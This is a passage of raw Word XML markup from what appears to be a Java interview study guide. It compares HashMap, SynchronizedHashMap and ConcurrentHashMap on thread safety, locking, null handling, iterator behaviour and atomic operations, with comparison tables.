                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ConcurrentHashMap</w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for better scalability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="35313D1D" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="781688B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High Concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1387B7D7"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t>Not suitable (performance issues due to global lock)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58A4612F"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Best choice</w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for high-concurrency scenarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D0250BC"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pict w14:anchorId="16B0F0AA">
          <v:rect id="_x0000_i7426" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE015E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8. Why Prefer ConcurrentHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB56EC6"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lastRenderedPageBreak/>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>recommended solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for high-concurrency environments as it allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>greater parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>better scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6787AE"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ynchronizedHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, while thread-safe, is </w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>less efficient</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>global lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the entire map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CD11AD"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="1D0D5C1D">
          <v:rect id="_x0000_i7427" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="662BF02A" w14:textId="77777777" w:rsidR="00D96848" w:rsidRPr="00D96848" w:rsidRDefault="00D96848" w:rsidP="00D96848">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA95EB0"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SynchronizedHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronized methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a regular HashMap and locks the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>entire map</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which results in performance bottlenecks in high-concurrency environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A26134" w14:textId="77777777" w:rsidR="00D96848" w:rsidRPr="00D96848" w:rsidRDefault="00D96848" w:rsidP="00D96848">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fine-grained locks</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, allowing high-performance concurrent access to the map, making it </w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>more suitable</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for modern, highly-concurrent applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69671A73" w14:textId="77777777" w:rsidR="00EE66E8" w:rsidRPr="004F2440" w:rsidRDefault="00EE66E8" w:rsidP="00EE66E8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F2440">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="3EC6DF57">
          <v:rect id="_x0000_i3942" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="795AE60C" w14:textId="77777777" w:rsidR="009217B8" w:rsidRPr="00CE4B95" w:rsidRDefault="009217B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="192" w:name="_Toc197867406"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between HashMap and ConcurrentHashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="192"/>
    </w:p>
    <w:p w14:paraId="5ED46E8A" w14:textId="47B63C0F" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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ConcurrentHashMap are both part of the Java Collections Framework, but they are designed for different use cases, particularly in multithreaded environments. Here are the key differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A19D4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F30B4">
          <v:rect id="_x0000_i1550" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="511C1512"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3D6130AD"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952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Multiple threads accessing or modifying a HashMap concurrently can lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data inconsistenc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rruption</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1AF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not safe for use in concurrent environments unless externally synchronized using Collections.synchronizedMap().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7897AF6A"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6E31661F"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specifically designed for concurrent access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7827B3C3"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threads to read and write to the map concurrently without compromising data consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26282D76"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of entire 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fine-grained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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E64D7D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C52F7">
          <v:rect id="_x0000_i1551" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB83F80"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ynchronization Mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1068CB93"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1F56711D"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any internal synchronization. If you want to make it thread-safe, you must synchronize it externally using something like Collections.synchronizedMap().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523E2D8A"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3665F654"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segmented locks or bucket-level locks) to allow multiple threads to perform operations concurrently without locking the entire map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A7BD46"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oncurrent reads and writes without blocking other threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E14E838"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7A506">
          <v:rect id="_x0000_i1552" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="431D7241"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BB4F89C"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48B2601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single-threaded scenarios because it does not have to deal with the overhead of synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1C85DA"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multi-threaded applications, performance degrades because external synchronization is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2747EAF1"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0D0CE50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mized for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> access and provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>higher performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in multi-threaded environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BA662D"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only the specific segment or bucket is locked, other threads can continue to access different segments concurrently, making it scalable in multi-threaded scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EEAE22"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2A21C">
          <v:rect id="_x0000_i1553" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="769B0366"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Behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DE50F9"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2D5301A"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mechanism. If you perform an operation on a HashMap concurrently, external synchronization is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A358DE"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50952D91"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to allow multiple threads to work concurrently on different segments or buckets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0601E354"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instance, operations like put(), remove(), and replace() are atomic and thread-safe, but only lock the relevant part of the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117AC437"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get() operations are lock-free, meaning they do not require any synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC63C63"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81D83A">
          <v:rect id="_x0000_i1554" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2907639B"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Keys/Values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B84E948"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F63CEE"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one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058C6522"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61087B0"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If you try to insert a null key or value, it will throw a NullPointerException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73326FE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A8F">
          <v:rect id="_x0000_i1555" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FD0D8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terator Behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FD9917"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9E6CA1E"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HashMap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If the map is modified (other than through the iterator itself) during iteration, a ConcurrentModificationException will be thrown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E4B4AB"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1F3E0CF"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ConcurrentHashMap is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 will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map is modified while iterating (in some cases, modifications are visible to the iterator).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5404332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058">
          <v:rect id="_x0000_i1556" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="402A28DE"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2C6EA91D"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C5A768F"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thread safety is not a concern (single-threaded or externally synchronized environments).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25830832"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non-concurrent, fast lookups in single-threaded applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDE1B24"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9C3F7AB"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concurrent applications where multiple threads are accessing or modifying the map at the same time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E010875"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multi-threaded scenarios where you need thread-safe operations without sacrificing performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AE1FD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86C5A">
          <v:rect id="_x0000_i1557" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B090CF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ulk Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15435BF7"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2BCC59"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built-in methods for atomic operations, such as putIfAbsent(), remove(), or replace().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4B6653"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AA13885"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atomic operations like putIfAbsent(), replace(), remove(), and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>compute operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like computeIfAbsent(), computeIfPresent()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16023344"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ensure thread-safe, atomic changes to the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D756F5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318040">
          <v:rect id="_x0000_i1558" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3E8E2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4162"/>
        <w:gridCol w:w="4529"/>
      </w:tblGrid>
      <w:tr w:rsidR="0077291C" w:rsidRPr="00CE4B95" w14:paraId="5206F993" w14:textId="77777777" w:rsidTr="005A02C9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73DFD40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CD58E9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7CC41D9"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77291C" w:rsidRPr="00CE4B95" w14:paraId="19354BBC" w14:textId="77777777" w:rsidTr="005A02C9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70A14AC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76BE8D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0759C05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r>
      <w:tr w:rsidR="0077291C" w:rsidRPr="00CE4B95" w14:paraId="60722388" w14:textId="77777777" w:rsidTr="005A02C9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CA73B9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6A711D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external sync needed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7263243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s (bucket-level)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0077291C" w:rsidRPr="00CE4B95" w14:paraId="15042D40" w14:textId="77777777" w:rsidTr="005A02C9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15C9FD7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10E592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apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E7F4EF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d for high concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0077291C" w:rsidRPr="00CE4B95" w14:paraId="6132773A" w14:textId="77777777" w:rsidTr="005A02C9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C48A9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AADED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 key and value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D7AF5B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value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0077291C" w:rsidRPr="00CE4B95" w14:paraId="14D5C74B" w14:textId="77777777" w:rsidTr="005A02C9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6814D9E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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02F8CAC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fast</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D8866A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safe (no ConcurrentModificationException)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0077291C" w:rsidRPr="00CE4B95" w14:paraId="5014D93D" w14:textId="77777777" w:rsidTr="005A02C9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
